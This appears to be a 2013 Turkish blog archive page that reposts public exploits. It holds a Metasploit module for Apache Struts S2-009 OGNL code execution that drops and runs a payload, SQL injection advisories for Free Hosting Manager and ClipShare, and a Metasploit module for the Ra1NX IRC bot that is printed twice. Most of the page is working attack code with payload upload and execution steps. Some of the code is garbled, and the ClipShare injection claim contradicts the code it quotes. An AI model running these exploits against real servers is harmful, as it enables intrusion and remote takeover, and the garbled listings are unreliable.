Archive for 25 Mart 2013

Apache Struts ParametersInterceptor Remote Code Execution

Apache Struts ParametersInterceptor Remote Code Execution Metasploit Exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata and options for CVE-2011-3923 (Struts S2-009). Notes for
  # defenders, all taken from the code in this file:
  #  * every request is a plain HTTP GET whose query string carries OGNL
  #    (see execute_command); tokens such as `#context[`, `_memberAccess`,
  #    `allowStaticMethodAccess` and `@java.lang.Runtime@getRuntime` in request
  #    parameters are a direct signature for access-log review or a WAF rule,
  #    bearing in mind they travel percent-encoded;
  #  * the payload is written to disk in base64 chunks through
  #    java.io.FileOutputStream (java_upload_part), so a burst of ~2 kB GETs to
  #    one action is a second indicator;
  #  * the description states affected versions are < 2.3.1.2.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Struts ParametersInterceptor Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote command execution vulnerability in Apache Struts
        versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows
        for the use of parentheses which in turn allows it to interpret parameter values as
        OGNL expressions during certain exception handling for mismatched data types of
        properties which allows remote attackers to execute arbitrary Java code via a
        crafted parameter.
      },
      'Author'         =>
        [
          'Meder Kydyraliev', # Vulnerability Discovery and PoC
          'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
          'mihi' #ARCH_JAVA support
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-3923'],
          [ 'OSVDB', '78501'],
          [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],
          [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']
        ],
      'Platform'      => [ 'win', 'linux', 'java'],
      'Privileged'     => true,
      'Targets'        =>
        [
          ['Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'windows'
            }
          ],
          ['Linux Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ],
          [ 'Java Universal',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            },
          ]
        ],
      'DisclosureDate' => 'Oct 01 2011',
      'DefaultTarget' => 2))

      # TARGETURI must contain the literal marker INJECT; execute_command
      # replaces it with the crafted parameter string.
      register_options(
        [
          Opt::RPORT(8080),
          OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
          OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]),
          OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
    ], self.class)
  end

  # Sends one OGNL expression to the target through the vulnerable parameter.
  #
  # @param cmd  [String] OGNL expression to evaluate on the server
  # @param opts [Hash]   unused in the body shown here
  # @return whatever send_request_cgi returns (`check` tests it for nil)
  def execute_command(cmd, opts = {})
    # Template; PARAMETERTOKEN and CMD are substituted below. The two
    # assignments name OGNL's denyMethodExecution / allowStaticMethodAccess
    # guards and set them to false / true before CMD is evaluated.
    inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
    inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"
    # Both substitutions are URI-encoded, so the markers above appear
    # percent-encoded on the wire; decode before pattern-matching in logs.
    inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))
    inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))
    # Fresh copy so the in-place gsub! below cannot alter the datastore value.
    uri = String.new(datastore['TARGETURI'])
    uri = normalize_uri(uri)
    # If TARGETURI carries no literal INJECT marker this is a silent no-op and
    # an unmodified request goes out.
    uri.gsub!(/INJECT/,inject) # append the injection string
    resp = send_request_cgi({
      'uri'     => uri,
      'version' => '1.1',
      'method'  => 'GET',
    })
    return resp #Used for check function.
  end

  # Uploads the payload in chunks, then launches it. The target platform
  # decides the drop path, whether a chmod step is needed (linux only) and the
  # launch expression. Responses from execute_command are never inspected here,
  # so a failed chunk is not detected.
  def exploit
    #Set up generic values.
    # 4 to 7 random alphanumerics; the platform branch turns this into a path.
    @payload_exe = rand_text_alphanumeric(4+rand(4))
    pl_exe = generate_payload_exe
    # Starts as the *string* 'false' and is later set to the *boolean* true.
    # Both interpolate into the FileOutputStream append flag (java_upload_part)
    # as "false"/"true", so it works, but the mixed types read as a bug.
    append = 'false'
    #Now arch specific...
    case target['Platform']
    when 'linux'
      @payload_exe = "/tmp/#{@payload_exe}"
      # "/bin/sh_-c_..." is split on "_" on the target to form an argv array;
      # that only works because the random name contains no underscore.
      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
    when 'java'
      # No directory prefix: relative to wherever the target JVM resolves
      # relative paths (typically its working directory).
      @payload_exe << ".jar"
      pl_exe = payload.encoded_jar.pack
      exec_cmd = ""
      # Sets two private OgnlRuntime fields (_jdkChecked=true, _jdk15=false)
      # via reflection, then loads the dropped jar with a URLClassLoader and
      # invokes metasploit.Payload.main with an empty String[].
      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
      exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
      exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
      exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
      exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
      exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
    when 'windows'
      # Relative path with an .exe suffix, launched directly by Runtime.exec.
      @payload_exe = "./#{@payload_exe}.exe"
      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
    else
      fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')
    end

    #Now with all the arch specific stuff set, perform the upload.
    #109 = length of command string plus the max length of append.
    # Per-request URL budget of 2048 characters minus the fixed overhead; the
    # /4*3 step converts the remaining character budget to raw bytes, because
    # java_upload_part base64-encodes each chunk (4 chars per 3 bytes).
    sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length
    chunk_length = 2048 - sub_from_chunk
    chunk_length = ((chunk_length/4).floor)*3
    # All full-size chunks first (the first write truncates, the rest append),
    # then whatever remains.
    while pl_exe.length > chunk_length
      java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
      pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]
      append = true
    end
    java_upload_part(pl_exe,@payload_exe,append)
    # chmod_cmd is only assigned in the linux branch; the guard keeps this line
    # from touching an unset local on the other targets.
    execute_command(chmod_cmd) if target['Platform'] == 'linux'
    execute_command(exec_cmd)
    # FileDropper mixin: the dropped file is registered for later removal.
    register_files_for_cleanup(@payload_exe)
  end

  # Writes one base64-encoded chunk to a file on the target via
  # java.io.FileOutputStream.
  #
  # @param part     [String] raw bytes of this chunk
  # @param filename [String] intended target path. NOTE(review): unused in the
  #   body as shown -- the FileOutputStream path is the literal '#(unknown)',
  #   which looks like an extraction artifact rather than the module's intent.
  # @param append   [String, Boolean] interpolated verbatim as the Java append flag
  # @return whatever execute_command returns
  def java_upload_part(part, filename, append = 'false')
    cmd = ""
    cmd << "#f=new java.io.FileOutputStream('#(unknown)',#{append}),"
    cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
    cmd << "#f.close()"
    execute_command(cmd)
  end

  # Timing-based check: asks the server to sleep CHECK_SLEEPTIME seconds and
  # compares the wall-clock round trip with that value.
  #
  # @return [Exploit::CheckCode] Safe when there is no response or the reply
  #   came back faster than the requested sleep; Appears otherwise. Only elapsed
  #   time is measured, so a slow or timing-out target also yields Appears --
  #   a false positive worth remembering when reading scan results.
  def check
    sleep_time = datastore['CHECK_SLEEPTIME']
    # Thread.sleep takes milliseconds.
    check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
    # Time.now is wall clock; a monotonic clock would be immune to clock
    # adjustments during the request.
    t1 = Time.now
    print_status("Asking remote server to sleep for #{sleep_time} seconds")
    response = execute_command(check_cmd)
    t2 = Time.now
    delta = t2 - t1


    if response.nil?
      return Exploit::CheckCode::Safe
    elsif delta < sleep_time
      return Exploit::CheckCode::Safe
    else
      return Exploit::CheckCode::Appears
    end
  end

end

Free Hosting Manager V2.0.2 Multiple SQLi

Free Hosting Manager V2.0.2 Genel SQL injection açığına ilişkin exploit

-------------------------------------------------------------------------
# Software      : Free Hosting Manager V2.0.2    Multiple SQLi                                                                                                          
# Author        : Saadat Ullah , saadi_linux@rocketmail.com                               
# Author home  : http://security-geeks.blogspot.com
# Date          : 23/3/13   
# Vendors  : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php  
                                                                                     
-------------------------------------------------------------------------
 --- [ Multiple SQL injection] --- 
It is vulnerable to SQLi in many files; some of them are:

http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie-based injection in
http://localhost/free/clients/home.php
inject the cookie value clientuser
http://localhost/free/clients/register.php --->  SQLi on all POST Fields.

Proof Of Concept
In home.php
It calls a function auth(), which looks like this:

if ((isset($_COOKIE[&#39;clientuser&#39;])) && isset($_COOKIE[&#39;clientpass&#39;]) && isset($_COOKIE[&#39;clientid&#39;])) {

$clientuser = $_COOKIE[&#39;clientuser&#39;];
$clientpass = $_COOKIE[&#39;clientpass&#39;];
$clientid = $_COOKIE[&#39;clientid&#39;];
$this-> clientuser = $_COOKIE[&#39;clientuser&#39;];
$this-> clientpass = $_COOKIE[&#39;clientpass&#39;];
$this-> clientid = $_COOKIE[&#39;clientid&#39;];
return true;

$dbquery = @mysql_query("SELECT * FROM clients WHERE id=&#39;$clientid&#39; AND username=&#39;$clientuser&#39; AND password=&#39;$clientpass&#39;") or die(mysql_error());


In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]

elseif ((isset($code)) || ($_GET[&#39;do&#39;] == "code")) {

$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode=&#39;$code&#39;") 
or die(mysql_error());

In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET[&#39;id&#39;])) && ($_GET[&#39;action&#39;] == "close") && ($_GET[&#39;confirm&#39;] == "true")) {
$fhm-> closeticket($_GET[&#39;id&#39;]);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id=&#39;$ticket&#39; AND clientid=&#39;$this-> clientid&#39;") or die(mysql_error());

In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]

$id = $_GET[&#39;id&#39;];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id=&#39;$id&#39; AND clientid=&#39;$fhm-> clientid&#39;") or die(mysql_error());

In register.php

$firstname = stripslashes($_POST[&#39;first_name&#39;]);
$lastname = stripslashes($_POST[&#39;last_name&#39;]);
$company = stripslashes($_POST[&#39;company&#39;]);
$address = stripslashes($_POST[&#39;address&#39;]);
$address2 = stripslashes($_POST[&#39;address_2&#39;]);
$country = stripslashes($_POST[&#39;country&#39;]);
$city = stripslashes($_POST[&#39;city&#39;]);
$state = stripslashes($_POST[&#39;state_region&#39;]);
$postcode = stripslashes($_POST[&#39;postal_code&#39;]);
$telnumber = stripslashes($_POST[&#39;tel_number&#39;]);
$faxnumber = stripslashes($_POST[&#39;fax_number&#39;]);
$emailaddress = stripslashes($_POST[&#39;email_address&#39;]);
$username = stripslashes($_POST[&#39;username&#39;]);
$password1 = stripslashes($_POST[&#39;password&#39;]);
$password2 = stripslashes($_POST[&#39;confirm_password&#39;]);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES(&#39;&#39;, &#39;$username&#39;, &#39;$md5pass&#39;, &#39;$firstname&#39;, &#39;$lastname&#39;, &#39;$company&#39;, &#39;$address&#39;, &#39;$address2&#39;, &#39;$city&#39;, &#39;$country&#39;, &#39;$state&#39;, &#39;$postcode&#39;, &#39;$telnumber&#39;, &#39;$faxnumber&#39;, &#39;$emailaddress&#39;, &#39;$startingcredits&#39;, &#39;1&#39;, &#39;&#39;, &#39;&#39;, &#39;$timestamp&#39;) ") 

Only stripslashes() is applied, which does not protect against SQL injection.

#independent Pakistani Security Researcher


  

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection Vulnerability

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection açığına ilişkin exploit

# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Note : this only works if a group has been added to the community
#Last Checked: 24 March 2013

#to exploit this vulnerability the MAGIC_QUOTES_GPC directive must be turned off on the server side (php.ini)

==============================================================================================

#Vulnerable Script:
PHP script : gmembers.php on line 23

=========================== BEGIN OF gmembers.php =============================================

 <?php
/************************************************************************************************
| Software Name        : ClipShare - Video Sharing Community Script
| Software Author      : Clip-Share.Com / ScriptXperts.Com
| Website              : http://www.clip-share.com
| E-mail               : office@clip-share.com
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

// NOTE(review): this listing was HTML-extracted; quotes and brackets appear as
// character entities (&#39; &#91; &#93;) and were left exactly as found.
require(&#39;include/config.php&#39;);
require(&#39;include/function.php&#39;);
require(&#39;classes/pagination.class.php&#39;);
// Include path built from session state; whether $_SESSION['language'] is
// validated where it is set is outside this excerpt.
require(&#39;language/&#39; .$_SESSION&#91;&#39;language&#39;&#93;. &#39;/gmembers.lang.php&#39;);

$gname  = NULL;
$gurl   = NULL;
$oid    = NULL;
// Line 23 of the original file (the line the advisory points at). gid is read
// from $_REQUEST, kept only when is_numeric() holds, and then passed through
// mysql_real_escape_string(); any other value becomes NULL. As written, a
// non-numeric value never reaches the query below.
$gid    = ( isset($_REQUEST&#91;&#39;gid&#39;&#93;) && is_numeric($_REQUEST&#91;&#39;gid&#39;&#93;) ) ? mysql_real_escape_string($_REQUEST&#91;&#39;gid&#39;&#93;) : NULL;
// Built by string concatenation inside single quotes; with $gid NULL this
// becomes GID='' and the else-branch below redirects to error.php.
$sql    = "SELECT * FROM group_own WHERE GID=&#39;" .$gid. "&#39; limit 1";
$rs     = $conn-> execute($sql);
if ( $conn-> Affected_Rows() == 1 ) {
    $urlkey     = $rs-> fields[&#39;gurl&#39;];
    $gname      = $rs-> fields[&#39;gname&#39;];
    $gupload    = $rs-> fields[&#39;gupload&#39;];
    $oid        = $rs-> fields[&#39;OID&#39;];
    STemplate::assign(&#39;gname&#39;, $gname);
    STemplate::assign(&#39;gurl&#39;, $urlkey);
    STemplate::assign(&#39;gupload&#39;, $gupload);
} else {
    // No matching group: close the session write and redirect to the error page.
    session_write_close();
    header(&#39;Location: &#39; .$config[&#39;BASE_URL&#39;]. &#39;/error.php?type=group_missing&#39;);
    die();
}
...........................................;
...............................................
 
?> 

============================================================================================================


 
Poc :

http://server/mavideo/gmembers.php?gid=6 [Blind SQLi]

Real exploitation :

 http://server/mavideo/gmembers.php?gid=6 AND 1=1
==>  return normal page

http://server/mavideo/gmembers.php?gid=6 AND 1=2
==>  return page with some errors ( or with nothing - white page )
Note: line 23 of the excerpt above accepts gid only when is_numeric() holds and then passes it through mysql_real_escape_string(); a value such as `6 AND 1=2` fails that test and is replaced by NULL, which routes the request to the group_missing redirect. The differing responses described here are therefore also consistent with that redirect rather than with evaluated SQL, and should be confirmed against the actual vulnerable line before this is treated as injectable.



--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team

./Esac

"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Uzaktan Kod Çalıştırma Açığı

# Exploit Title: “Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  # NOTE(review): this listing was pasted through a blog engine and is garbled:
  # curly quotes stand in for string delimiters, `< <` appears where a single
  # append operator would be expected, and `rn` appears where escaped IRC line
  # terminators presumably were. It will not parse as shown. The layout below
  # only re-breaks the collapsed lines; no token has been altered.
  #
  # Module metadata and options. Everything the module does is plain IRC
  # traffic: a registration, one PRIVMSG to the bot's nick, and a QUIT.
  def initialize(info = {})
    super(update_info(info,
      'Name' => '”Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution',
      'Description' => %q{
This module allows remote command execution on the PHP IRC bot Ra1NX by
using the public call feature in private message to covertly bypass the
authentication system.
},
      'Author' =>
        [
          'bwall ' # Ra1NX analysis and Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
          ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
          ['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
        ],
      'Platform' => [ 'unix', 'win'],
      'Arch' => ARCH_CMD,
      'Payload' =>
        {
          'Space' => 344,
          'BadChars' => '',
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
            }
        },
      'Targets' =>
        [
          [ 'Ra1NX', { } ]
        ],
      'Privileged' => false,
      'DisclosureDate' => 'March 24 2013',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
        OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),
        OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])
      ], self.class)
  end

  # Checks for the bot by asking it to echo a random string through its public
  # `@msg` call and looking for that string in the reply.
  #
  # @return [Exploit::CheckCode] Unknown when the IRC server rejects the
  #   registration (numeric 463/464 in the reply), Vulnerable when the echo
  #   comes back, Safe otherwise.
  def check
    connect

    response = register(sock)
    if response =~ /463/ or response =~ /464/
      print_error(“#{rhost}:#{rport} – Connection to the IRC Server not allowed”)
      return Exploit::CheckCode::Unknown
    end
    confirm_string = rand_text_alpha(8)
    response = send_msg(sock, “PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}rn”)
    # The raw reply is printed unfiltered; it comes straight from the remote host.
    print response
    quit(sock)
    disconnect

    if response =~ /#{confirm_string}/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Writes `data` to the socket and collects whatever arrives until a 1-second
  # read returns nil or the peer closes the connection (EOFError is swallowed
  # and the partial buffer returned).
  #
  # @param sock socket from the Tcp mixin
  # @param data [String] bytes to send
  # @return [String] everything read back
  def send_msg(sock, data)
    sock.put(data)
    data = “”
    begin
      read_data = sock.get_once(-1, 1)
      while not read_data.nil?
        data < < read_data
        read_data = sock.get_once(-1, 1)
      end
    rescue EOFError
    end
    data
  end

  # Performs the IRC registration handshake (optional PASS, then NICK and USER).
  # Nicks longer than 9 characters are replaced by a random 9-character one.
  #
  # @return [String] the server's reply, as collected by send_msg
  def register(sock)
    msg = ""
    if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
      msg < < "PASS #{datastore['IRC_PASSWORD']}rn"
    end
    if datastore['NICK'].length > 9
      nick = rand_text_alpha(9)
      print_error(“The nick is longer than 9 characters, using #{nick}”)
    else
      nick = datastore['NICK']
    end

    msg < < "NICK #{nick}rn"
    msg < < "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn"
    response = send_msg(sock,msg)
    return response
  end

  # Sends the encoded payload to the bot as a `@<PHP_EXEC>` public call inside
  # a private message. For detection: the whole command travels in one PRIVMSG
  # addressed to the bot's nick, so `@system` (or whatever PHP_EXEC is set to)
  # arriving from an arbitrary nick is the observable on the IRC side.
  #
  # @return [String] the reply collected by send_msg
  def ra1nx_command(sock)
    encoded = payload.encoded
    command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}rn"
    response = send_msg(sock, command_msg)
    return response
  end

  # Sends QUIT; nothing is read back.
  def quit(sock)
    quit_msg = "QUIT :bye byern"
    sock.put(quit_msg)
  end

  # Register, send the command, quit. The 463/464 handling duplicates `check`.
  def exploit
    connect
    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    response = register(sock)
    if response =~ /463/ or response =~ /464/
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return
    end
    print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
    ra1nx_command(sock)
    quit(sock)
    disconnect
  end
end
[/sourcecode]

“Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Uzaktan Kod Çalıştırma Açığı

# Exploit Title: “Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  # NOTE(review): this listing was pasted through a blog engine and is garbled:
  # curly quotes stand in for string delimiters, `< <` appears where a single
  # append operator would be expected, and `rn` appears where escaped IRC line
  # terminators presumably were. It will not parse as shown. The layout below
  # only re-breaks the collapsed lines; no token has been altered.
  #
  # Module metadata and options. Everything the module does is plain IRC
  # traffic: a registration, one PRIVMSG to the bot's nick, and a QUIT.
  def initialize(info = {})
    super(update_info(info,
      'Name' => '”Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution',
      'Description' => %q{
This module allows remote command execution on the PHP IRC bot Ra1NX by
using the public call feature in private message to covertly bypass the
authentication system.
},
      'Author' =>
        [
          'bwall ' # Ra1NX analysis and Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
          ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
          ['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
        ],
      'Platform' => [ 'unix', 'win'],
      'Arch' => ARCH_CMD,
      'Payload' =>
        {
          'Space' => 344,
          'BadChars' => '',
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
            }
        },
      'Targets' =>
        [
          [ 'Ra1NX', { } ]
        ],
      'Privileged' => false,
      'DisclosureDate' => 'March 24 2013',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
        OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),
        OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])
      ], self.class)
  end

  # Checks for the bot by asking it to echo a random string through its public
  # `@msg` call and looking for that string in the reply.
  #
  # @return [Exploit::CheckCode] Unknown when the IRC server rejects the
  #   registration (numeric 463/464 in the reply), Vulnerable when the echo
  #   comes back, Safe otherwise.
  def check
    connect

    response = register(sock)
    if response =~ /463/ or response =~ /464/
      print_error(“#{rhost}:#{rport} – Connection to the IRC Server not allowed”)
      return Exploit::CheckCode::Unknown
    end
    confirm_string = rand_text_alpha(8)
    response = send_msg(sock, “PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}rn”)
    # The raw reply is printed unfiltered; it comes straight from the remote host.
    print response
    quit(sock)
    disconnect

    if response =~ /#{confirm_string}/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Writes `data` to the socket and collects whatever arrives until a 1-second
  # read returns nil or the peer closes the connection (EOFError is swallowed
  # and the partial buffer returned).
  #
  # @param sock socket from the Tcp mixin
  # @param data [String] bytes to send
  # @return [String] everything read back
  def send_msg(sock, data)
    sock.put(data)
    data = “”
    begin
      read_data = sock.get_once(-1, 1)
      while not read_data.nil?
        data < < read_data
        read_data = sock.get_once(-1, 1)
      end
    rescue EOFError
    end
    data
  end

  # Performs the IRC registration handshake (optional PASS, then NICK and USER).
  # Nicks longer than 9 characters are replaced by a random 9-character one.
  #
  # @return [String] the server's reply, as collected by send_msg
  def register(sock)
    msg = ""
    if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
      msg < < "PASS #{datastore['IRC_PASSWORD']}rn"
    end
    if datastore['NICK'].length > 9
      nick = rand_text_alpha(9)
      print_error(“The nick is longer than 9 characters, using #{nick}”)
    else
      nick = datastore['NICK']
    end

    msg < < "NICK #{nick}rn"
    msg < < "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn"
    response = send_msg(sock,msg)
    return response
  end

  # Sends the encoded payload to the bot as a `@<PHP_EXEC>` public call inside
  # a private message. For detection: the whole command travels in one PRIVMSG
  # addressed to the bot's nick, so `@system` (or whatever PHP_EXEC is set to)
  # arriving from an arbitrary nick is the observable on the IRC side.
  #
  # @return [String] the reply collected by send_msg
  def ra1nx_command(sock)
    encoded = payload.encoded
    command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}rn"
    response = send_msg(sock, command_msg)
    return response
  end

  # Sends QUIT; nothing is read back.
  def quit(sock)
    quit_msg = "QUIT :bye byern"
    sock.put(quit_msg)
  end

  # Register, send the command, quit. The 463/464 handling duplicates `check`.
  def exploit
    connect
    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    response = register(sock)
    if response =~ /463/ or response =~ /464/
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return
    end
    print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
    ra1nx_command(sock)
    quit(sock)
    disconnect
  end
end
[/sourcecode]